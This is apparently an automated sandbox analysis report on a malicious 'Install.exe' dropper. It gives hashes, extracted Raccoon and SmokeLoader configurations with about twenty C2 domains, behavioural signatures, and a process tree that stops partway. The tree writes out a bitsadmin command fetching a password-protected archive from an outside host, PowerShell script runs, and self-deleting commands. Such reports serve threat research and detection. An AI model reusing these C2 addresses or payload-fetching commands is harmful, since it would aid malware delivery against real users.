Resubmissions

24-04-2021 20:28

210424-217qe8tpzs 10

24-04-2021 19:14

210424-6ffz35kxsx 10

24-04-2021 19:14

210424-ymq8bz33ts 10

24-04-2021 19:13

210424-2xx4hckd6s 10

24-04-2021 19:13

210424-4wwwcb3ajj 10

24-04-2021 15:54

210424-426ksbtgsa 10

24-04-2021 08:51

210424-1tz5lee51n 10

24-04-2021 06:41

210424-kfsqa5cgvx 10

Analysis

  • max time kernel
    55s
  • max time network
    134s
  • platform
    windows10_x64
  • resource
    win10v20210410
  • submitted
    24-04-2021 06:41

Errors

Reason
Machine shutdown

General

  • Target

    Install.exe

  • Size

    497KB

  • MD5

    41a5f4fd1ea7cac4aa94a87aebccfef0

  • SHA1

    0d0abf079413a4c773754bf4fda338dc5b9a8ddc

  • SHA256

    97e95e99fd499ec45a7c1d8683d5731ce5e7a8fb8b710622e578cd169a00d8d9

  • SHA512

    5ca14bda498f26efff4e1179969b8f2c25244063c7bf25f3ec20b5cd24b5be320bbfb8b3d0b2d66f5c5b415da777a766fece5f251a4247773c6cb991417fb75f

Malware Config

Extracted

Family

raccoon

Botnet

9afb493c6f82d08075dbbfa7d93ce97f1dbf4733

Attributes
  • url4cnc

    https://tttttt.me/antitantief3

rc4.plain
rc4.plain

Extracted

Family

smokeloader

Version

2020

C2

http://999080321newfolder1002002131-service1002.space/

http://999080321newfolder1002002231-service1002.space/

http://999080321newfolder3100231-service1002.space/

http://999080321newfolder1002002431-service1002.space/

http://999080321newfolder1002002531-service1002.space/

http://999080321newfolder33417-012425999080321.space/

http://999080321test125831-service10020125999080321.space/

http://999080321test136831-service10020125999080321.space/

http://999080321test147831-service10020125999080321.space/

http://999080321test146831-service10020125999080321.space/

http://999080321test134831-service10020125999080321.space/

http://999080321est213531-service1002012425999080321.ru/

http://999080321yes1t3481-service10020125999080321.ru/

http://999080321test13561-service10020125999080321.su/

http://999080321test14781-service10020125999080321.info/

http://999080321test13461-service10020125999080321.net/

http://999080321test15671-service10020125999080321.tech/

http://999080321test12671-service10020125999080321.online/

http://999080321utest1341-service10020125999080321.ru/

http://999080321uest71-service100201dom25999080321.ru/

rc4.i32
rc4.i32

Extracted

Family

metasploit

Version

windows/single_exec

Signatures

  • Glupteba

    Glupteba is a modular loader written in Golang with various components.

  • Glupteba Payload 2 IoCs
  • MetaSploit

    Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.

  • Raccoon

    Simple but powerful infostealer which was very active in 2019.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine Payload 2 IoCs
  • SmokeLoader

    Modular backdoor trojan in use since 2014.

  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • Checks for common network interception software 1 TTPs

    Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.

  • Nirsoft 2 IoCs
  • Blocklisted process makes network request 2 IoCs
  • Downloads MZ/PE file
  • Drops file in Drivers directory 1 IoCs
  • Executes dropped EXE 20 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Loads dropped DLL 10 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Adds Run key to start application 2 TTPs 1 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 1 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 3 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 3 IoCs
  • Suspicious use of SetThreadContext 2 IoCs
  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 9 IoCs
  • NSIS installer 2 IoCs
  • Checks SCSI registry key(s) 3 TTPs 6 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 3 IoCs
  • Download via BitsAdmin 1 TTPs 1 IoCs
  • Modifies Internet Explorer settings 1 TTPs 3 IoCs
  • Modifies data under HKEY_USERS 13 IoCs
  • Modifies registry class 64 IoCs
  • Modifies system certificate store 2 TTPs 2 IoCs
  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: MapViewOfSection 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of SetWindowsHookEx 5 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • c:\windows\system32\svchost.exe
    c:\windows\system32\svchost.exe -k netsvcs -s UserManager
    1⤵
      PID:1380
    • c:\windows\system32\svchost.exe
      c:\windows\system32\svchost.exe -k netsvcs -s SENS
      1⤵
        PID:1392
      • c:\windows\system32\svchost.exe
        c:\windows\system32\svchost.exe -k netsvcs -s Themes
        1⤵
          PID:1156
        • c:\windows\system32\svchost.exe
          c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc
          1⤵
            PID:1104
          • c:\windows\system32\svchost.exe
            c:\windows\system32\svchost.exe -k netsvcs -s Schedule
            1⤵
              PID:680
            • c:\windows\system32\svchost.exe
              c:\windows\system32\svchost.exe -k netsvcs -s gpsvc
              1⤵
                PID:996
              • c:\windows\system32\svchost.exe
                c:\windows\system32\svchost.exe -k netsvcs -s Browser
                1⤵
                  PID:2844
                • c:\windows\system32\svchost.exe
                  c:\windows\system32\svchost.exe -k netsvcs -s WpnService
                  1⤵
                    PID:2780
                  • c:\windows\system32\svchost.exe
                    c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt
                    1⤵
                    • Suspicious use of AdjustPrivilegeToken
                    PID:2760
                  • c:\windows\system32\svchost.exe
                    c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer
                    1⤵
                    • Suspicious use of AdjustPrivilegeToken
                    PID:2464
                  • c:\windows\system32\svchost.exe
                    c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT
                    1⤵
                      PID:2436
                    • c:\windows\system32\svchost.exe
                      c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection
                      1⤵
                        PID:1884
                      • C:\Users\Admin\AppData\Local\Temp\Install.exe
                        "C:\Users\Admin\AppData\Local\Temp\Install.exe"
                        1⤵
                        • Suspicious use of WriteProcessMemory
                        PID:3892
                        • C:\Users\Admin\AppData\Local\Temp\is-QMN63.tmp\Install.tmp
                          "C:\Users\Admin\AppData\Local\Temp\is-QMN63.tmp\Install.tmp" /SL5="$5006A,235791,152064,C:\Users\Admin\AppData\Local\Temp\Install.exe"
                          2⤵
                          • Executes dropped EXE
                          • Loads dropped DLL
                          • Suspicious use of WriteProcessMemory
                          PID:1916
                          • C:\Users\Admin\AppData\Local\Temp\is-P2QLP.tmp\Ultra.exe
                            "C:\Users\Admin\AppData\Local\Temp\is-P2QLP.tmp\Ultra.exe" /S /UID=burnerch1
                            3⤵
                            • Drops file in Drivers directory
                            • Executes dropped EXE
                            • Adds Run key to start application
                            • Suspicious use of AdjustPrivilegeToken
                            • Suspicious use of WriteProcessMemory
                            PID:2676
                            • C:\Program Files\Mozilla Firefox\MPJTYQPLWT\ultramediaburner.exe
                              "C:\Program Files\Mozilla Firefox\MPJTYQPLWT\ultramediaburner.exe" /VERYSILENT
                              4⤵
                              • Executes dropped EXE
                              • Suspicious use of WriteProcessMemory
                              PID:3776
                              • C:\Users\Admin\AppData\Local\Temp\is-6CHQ5.tmp\ultramediaburner.tmp
                                "C:\Users\Admin\AppData\Local\Temp\is-6CHQ5.tmp\ultramediaburner.tmp" /SL5="$5005C,281924,62464,C:\Program Files\Mozilla Firefox\MPJTYQPLWT\ultramediaburner.exe" /VERYSILENT
                                5⤵
                                • Executes dropped EXE
                                • Drops file in Program Files directory
                                • Suspicious behavior: EnumeratesProcesses
                                • Suspicious use of FindShellTrayWindow
                                • Suspicious use of WriteProcessMemory
                                PID:1304
                                • C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
                                  "C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe" -silent -desktopShortcut -programMenu
                                  6⤵
                                  • Executes dropped EXE
                                  PID:3964
                            • C:\Users\Admin\AppData\Local\Temp\00-e4de5-65f-aa597-27662f9b4551c\Tocudabaeny.exe
                              "C:\Users\Admin\AppData\Local\Temp\00-e4de5-65f-aa597-27662f9b4551c\Tocudabaeny.exe"
                              4⤵
                              • Executes dropped EXE
                              • Checks computer location settings
                              • Suspicious use of AdjustPrivilegeToken
                              PID:4024
                            • C:\Users\Admin\AppData\Local\Temp\dd-1a261-f45-bf9bb-c3abb99c72a25\Fidocajaby.exe
                              "C:\Users\Admin\AppData\Local\Temp\dd-1a261-f45-bf9bb-c3abb99c72a25\Fidocajaby.exe"
                              4⤵
                              • Executes dropped EXE
                              • Suspicious behavior: EnumeratesProcesses
                              • Suspicious use of AdjustPrivilegeToken
                              • Suspicious use of WriteProcessMemory
                              PID:2460
                              • C:\Windows\System32\cmd.exe
                                "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\5yjwljyr.1te\instEU.exe & exit
                                5⤵
                                • Suspicious use of WriteProcessMemory
                                PID:4456
                                • C:\Users\Admin\AppData\Local\Temp\5yjwljyr.1te\instEU.exe
                                  C:\Users\Admin\AppData\Local\Temp\5yjwljyr.1te\instEU.exe
                                  6⤵
                                    PID:4708
                                • C:\Windows\System32\cmd.exe
                                  "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\0laxyern.kal\md1_1eaf.exe & exit
                                  5⤵
                                  • Suspicious use of WriteProcessMemory
                                  PID:3872
                                  • C:\Users\Admin\AppData\Local\Temp\0laxyern.kal\md1_1eaf.exe
                                    C:\Users\Admin\AppData\Local\Temp\0laxyern.kal\md1_1eaf.exe
                                    6⤵
                                    • Executes dropped EXE
                                    • Checks whether UAC is enabled
                                    PID:4856
                                • C:\Windows\System32\cmd.exe
                                  "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\gtn1vuw3.2sc\google-game.exe & exit
                                  5⤵
                                  • Suspicious use of WriteProcessMemory
                                  PID:4488
                                  • C:\Users\Admin\AppData\Local\Temp\gtn1vuw3.2sc\google-game.exe
                                    C:\Users\Admin\AppData\Local\Temp\gtn1vuw3.2sc\google-game.exe
                                    6⤵
                                      PID:4892
                                      • C:\Windows\SysWOW64\rundll32.exe
                                        "C:\Windows\System32\rundll32.exe" "C:\Program Files\install.dll",install
                                        7⤵
                                          PID:5556
                                    • C:\Windows\System32\cmd.exe
                                      "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\r5nrnikw.raz\y1.exe & exit
                                      5⤵
                                      • Suspicious use of WriteProcessMemory
                                      PID:4760
                                      • C:\Users\Admin\AppData\Local\Temp\r5nrnikw.raz\y1.exe
                                        C:\Users\Admin\AppData\Local\Temp\r5nrnikw.raz\y1.exe
                                        6⤵
                                        • Executes dropped EXE
                                        PID:6056
                                        • C:\Users\Admin\AppData\Local\Temp\JdO6CLdwnY.exe
                                          "C:\Users\Admin\AppData\Local\Temp\JdO6CLdwnY.exe"
                                          7⤵
                                          • Executes dropped EXE
                                          • Modifies system certificate store
                                          PID:5188
                                          • C:\Users\Admin\AppData\Roaming\1619246812797.exe
                                            "C:\Users\Admin\AppData\Roaming\1619246812797.exe" /sjson "C:\Users\Admin\AppData\Roaming\1619246812797.txt"
                                            8⤵
                                            • Executes dropped EXE
                                            PID:2196
                                          • C:\Windows\SysWOW64\cmd.exe
                                            cmd /c ping 127.0.0.1 -n 3 & del "C:\Users\Admin\AppData\Local\Temp\JdO6CLdwnY.exe"
                                            8⤵
                                              PID:5772
                                              • C:\Windows\System32\Conhost.exe
                                                \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                9⤵
                                                • Loads dropped DLL
                                                • Suspicious use of AdjustPrivilegeToken
                                                • Suspicious use of WriteProcessMemory
                                                PID:5556
                                              • C:\Windows\SysWOW64\PING.EXE
                                                ping 127.0.0.1 -n 3
                                                9⤵
                                                • Runs ping.exe
                                                PID:3960
                                          • C:\Windows\SysWOW64\cmd.exe
                                            cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\r5nrnikw.raz\y1.exe"
                                            7⤵
                                              PID:5208
                                              • C:\Windows\SysWOW64\timeout.exe
                                                timeout /T 10 /NOBREAK
                                                8⤵
                                                • Delays execution with timeout.exe
                                                PID:6080
                                        • C:\Windows\System32\cmd.exe
                                          "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\2akyy0de.4hi\inst.exe & exit
                                          5⤵
                                            PID:5448
                                            • C:\Users\Admin\AppData\Local\Temp\2akyy0de.4hi\inst.exe
                                              C:\Users\Admin\AppData\Local\Temp\2akyy0de.4hi\inst.exe
                                              6⤵
                                              • Executes dropped EXE
                                              PID:5020
                                          • C:\Windows\System32\cmd.exe
                                            "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\gwswwxhq.ojs\SunLabsPlayer.exe /S & exit
                                            5⤵
                                            • Executes dropped EXE
                                            PID:4708
                                            • C:\Users\Admin\AppData\Local\Temp\gwswwxhq.ojs\SunLabsPlayer.exe
                                              C:\Users\Admin\AppData\Local\Temp\gwswwxhq.ojs\SunLabsPlayer.exe /S
                                              6⤵
                                              • Executes dropped EXE
                                              • Loads dropped DLL
                                              • Drops file in Program Files directory
                                              PID:5404
                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsp85E1.tmp\tempfile.ps1"
                                                7⤵
                                                  PID:4296
                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsp85E1.tmp\tempfile.ps1"
                                                  7⤵
                                                    PID:6088
                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                    powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsp85E1.tmp\tempfile.ps1"
                                                    7⤵
                                                      PID:5304
                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsp85E1.tmp\tempfile.ps1"
                                                      7⤵
                                                        PID:5276
                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsp85E1.tmp\tempfile.ps1"
                                                        7⤵
                                                          PID:5848
                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                          powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsp85E1.tmp\tempfile.ps1"
                                                          7⤵
                                                            PID:5980
                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                            powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsp85E1.tmp\tempfile.ps1"
                                                            7⤵
                                                              PID:5096
                                                            • C:\Windows\SysWOW64\bitsadmin.exe
                                                              "bitsadmin" /Transfer helper http://sunlabsinternational.com/data/data.7z C:\zip.7z
                                                              7⤵
                                                              • Download via BitsAdmin
                                                              PID:4320
                                                            • C:\Program Files (x86)\lighteningplayer\data_load.exe
                                                              "C:\Program Files (x86)\lighteningplayer\data_load.exe" -p8Sn1wY9H1gi4Vlf -y x C:\zip.7z -o"C:\Program Files\temp_files\"
                                                              7⤵
                                                                PID:4492
                                                              • C:\Program Files (x86)\lighteningplayer\data_load.exe
                                                                "C:\Program Files (x86)\lighteningplayer\data_load.exe" -p3EDfsj3RM1m33yP -y x C:\zip.7z -o"C:\Program Files\temp_files\"
                                                                7⤵
                                                                  PID:5360
                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                  powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsp85E1.tmp\tempfile.ps1"
                                                                  7⤵
                                                                    PID:4868
                                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                    powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsp85E1.tmp\tempfile.ps1"
                                                                    7⤵
                                                                      PID:5848
                                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                      powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsp85E1.tmp\tempfile.ps1"
                                                                      7⤵
                                                                        PID:4732
                                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsp85E1.tmp\tempfile.ps1"
                                                                        7⤵
                                                                          PID:5608
                                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                          powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsp85E1.tmp\tempfile.ps1"
                                                                          7⤵
                                                                            PID:4148
                                                                          • C:\Windows\SysWOW64\rundll32.exe
                                                                            C:\Windows\System32\rundll32.exe "C:\Program Files (x86)\EaIFXnVstsO\EaIFXnVstsO.dll" EaIFXnVstsO
                                                                            7⤵
                                                                              PID:5956
                                                                              • C:\Windows\system32\rundll32.exe
                                                                                C:\Windows\System32\rundll32.exe "C:\Program Files (x86)\EaIFXnVstsO\EaIFXnVstsO.dll" EaIFXnVstsO
                                                                                8⤵
                                                                                  PID:5000
                                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsp85E1.tmp\tempfile.ps1"
                                                                                7⤵
                                                                                  PID:5984
                                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                  powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsp85E1.tmp\tempfile.ps1"
                                                                                  7⤵
                                                                                    PID:3180
                                                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                    powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsp85E1.tmp\tempfile.ps1"
                                                                                    7⤵
                                                                                    • Blocklisted process makes network request
                                                                                    PID:5188
                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsp85E1.tmp\tempfile.ps1"
                                                                                    7⤵
                                                                                      PID:5176
                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                      powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsp85E1.tmp\tempfile.ps1"
                                                                                      7⤵
                                                                                        PID:2244
                                                                                      • C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe
                                                                                        "C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe" C:\Program Files (x86)\lighteningplayer\plugins\ /SILENT
                                                                                        7⤵
                                                                                          PID:2284
                                                                                    • C:\Windows\System32\cmd.exe
                                                                                      "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\g1bwlhwz.r0r\GcleanerWW.exe /mixone & exit
                                                                                      5⤵
                                                                                      • Executes dropped EXE
                                                                                      • Suspicious use of SetWindowsHookEx
                                                                                      • Suspicious use of WriteProcessMemory
                                                                                      PID:4892
                                                                                    • C:\Windows\System32\cmd.exe
                                                                                      "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\0xcilthh.fii\toolspab1.exe & exit
                                                                                      5⤵
                                                                                        PID:5852
                                                                                        • C:\Users\Admin\AppData\Local\Temp\0xcilthh.fii\toolspab1.exe
                                                                                          C:\Users\Admin\AppData\Local\Temp\0xcilthh.fii\toolspab1.exe
                                                                                          6⤵
                                                                                          • Executes dropped EXE
                                                                                          • Suspicious use of SetThreadContext
                                                                                          PID:4852
                                                                                          • C:\Users\Admin\AppData\Local\Temp\0xcilthh.fii\toolspab1.exe
                                                                                            C:\Users\Admin\AppData\Local\Temp\0xcilthh.fii\toolspab1.exe
                                                                                            7⤵
                                                                                            • Executes dropped EXE
                                                                                            • Loads dropped DLL
                                                                                            • Checks SCSI registry key(s)
                                                                                            • Suspicious behavior: MapViewOfSection
                                                                                            PID:6104
                                                                                      • C:\Windows\System32\cmd.exe
                                                                                        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ws1fpnhg.pwq\c7ae36fa.exe & exit
                                                                                        5⤵
                                                                                          PID:5904
                                                                                          • C:\Users\Admin\AppData\Local\Temp\ws1fpnhg.pwq\c7ae36fa.exe
                                                                                            C:\Users\Admin\AppData\Local\Temp\ws1fpnhg.pwq\c7ae36fa.exe
                                                                                            6⤵
                                                                                            • Executes dropped EXE
                                                                                            PID:3180
                                                                                        • C:\Windows\System32\cmd.exe
                                                                                          "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\2vgwbtqw.3h3\app.exe /8-2222 & exit
                                                                                          5⤵
                                                                                            PID:5196
                                                                                            • C:\Users\Admin\AppData\Local\Temp\2vgwbtqw.3h3\app.exe
                                                                                              C:\Users\Admin\AppData\Local\Temp\2vgwbtqw.3h3\app.exe /8-2222
                                                                                              6⤵
                                                                                              • Executes dropped EXE
                                                                                              PID:4416
                                                                                              • C:\Users\Admin\AppData\Local\Temp\2vgwbtqw.3h3\app.exe
                                                                                                "C:\Users\Admin\AppData\Local\Temp\2vgwbtqw.3h3\app.exe" /8-2222
                                                                                                7⤵
                                                                                                • Executes dropped EXE
                                                                                                PID:4920
                                                                                  • \??\c:\windows\system32\svchost.exe
                                                                                    c:\windows\system32\svchost.exe -k netsvcs -s BITS
                                                                                    1⤵
                                                                                    • Suspicious use of SetThreadContext
                                                                                    • Modifies registry class
                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                    • Suspicious use of WriteProcessMemory
                                                                                    PID:420
                                                                                    • C:\Windows\system32\svchost.exe
                                                                                      C:\Windows\system32\svchost.exe -k SystemNetworkService
                                                                                      2⤵
                                                                                      • Drops file in System32 directory
                                                                                      • Checks processor information in registry
                                                                                      • Modifies data under HKEY_USERS
                                                                                      PID:5808
                                                                                  • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
                                                                                    "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
                                                                                    1⤵
                                                                                    • Drops file in Windows directory
                                                                                    • Modifies Internet Explorer settings
                                                                                    • Modifies registry class
                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                    • Suspicious use of SetWindowsHookEx
                                                                                    PID:3764
                                                                                  • C:\Windows\system32\browser_broker.exe
                                                                                    C:\Windows\system32\browser_broker.exe -Embedding
                                                                                    1⤵
                                                                                    • Modifies Internet Explorer settings
                                                                                    PID:4136
                                                                                  • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                    "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                    1⤵
                                                                                    • Modifies registry class
                                                                                    • Suspicious behavior: MapViewOfSection
                                                                                    • Suspicious use of SetWindowsHookEx
                                                                                    • Suspicious use of WriteProcessMemory
                                                                                    PID:4884
                                                                                  • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                    "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                    1⤵
                                                                                    • Modifies Internet Explorer settings
                                                                                    • Modifies registry class
                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                    PID:5116
                                                                                  • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                    "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                    1⤵
                                                                                    • Modifies registry class
                                                                                    PID:4036
                                                                                  • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                    "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                    1⤵
                                                                                    • Modifies registry class
                                                                                    PID:5180
                                                                                  • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                    "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                    1⤵
                                                                                    • Modifies registry class
                                                                                    PID:5264
                                                                                  • \??\c:\windows\system32\svchost.exe
                                                                                    c:\windows\system32\svchost.exe -k netsvcs -s seclogon
                                                                                    1⤵
                                                                                    • Suspicious use of NtCreateUserProcessOtherParentProcess
                                                                                    PID:5868
                                                                                  • C:\Users\Admin\AppData\Local\Temp\5322.exe
                                                                                    C:\Users\Admin\AppData\Local\Temp\5322.exe
                                                                                    1⤵
                                                                                      PID:3208
                                                                                    • C:\Users\Admin\AppData\Local\Temp\5527.exe
                                                                                      C:\Users\Admin\AppData\Local\Temp\5527.exe
                                                                                      1⤵
                                                                                        PID:4816
                                                                                      • C:\Users\Admin\AppData\Local\Temp\5D46.exe
                                                                                        C:\Users\Admin\AppData\Local\Temp\5D46.exe
                                                                                        1⤵
                                                                                          PID:4636
                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 4636 -s 868
                                                                                            2⤵
                                                                                            • Program crash
                                                                                            PID:4776
                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 4636 -s 896
                                                                                            2⤵
                                                                                            • Program crash
                                                                                            PID:4268
                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 4636 -s 944
                                                                                            2⤵
                                                                                            • Program crash
                                                                                            PID:5692
                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 4636 -s 980
                                                                                            2⤵
                                                                                            • Program crash
                                                                                            PID:5256
                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 4636 -s 1152
                                                                                            2⤵
                                                                                            • Program crash
                                                                                            PID:4992
                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 4636 -s 1144
                                                                                            2⤵
                                                                                            • Program crash
                                                                                            PID:5020
                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 4636 -s 1152
                                                                                            2⤵
                                                                                            • Program crash
                                                                                            PID:5448
                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 4636 -s 1192
                                                                                            2⤵
                                                                                            • Program crash
                                                                                            PID:4872
                                                                                        • C:\Users\Admin\AppData\Local\Temp\6035.exe
                                                                                          C:\Users\Admin\AppData\Local\Temp\6035.exe
                                                                                          1⤵
                                                                                            PID:3200
                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                              "C:\Windows\System32\cmd.exe" /c timeout 1
                                                                                              2⤵
                                                                                                PID:4648
                                                                                                • C:\Windows\SysWOW64\timeout.exe
                                                                                                  timeout 1
                                                                                                  3⤵
                                                                                                  • Delays execution with timeout.exe
                                                                                                  PID:5292
                                                                                              • C:\Users\Admin\AppData\Local\Temp\6035.exe
                                                                                                "C:\Users\Admin\AppData\Local\Temp\6035.exe"
                                                                                                2⤵
                                                                                                  PID:4772
                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 3200 -s 2468
                                                                                                  2⤵
                                                                                                  • Program crash
                                                                                                  PID:804
                                                                                              • C:\Users\Admin\AppData\Local\Temp\68A2.exe
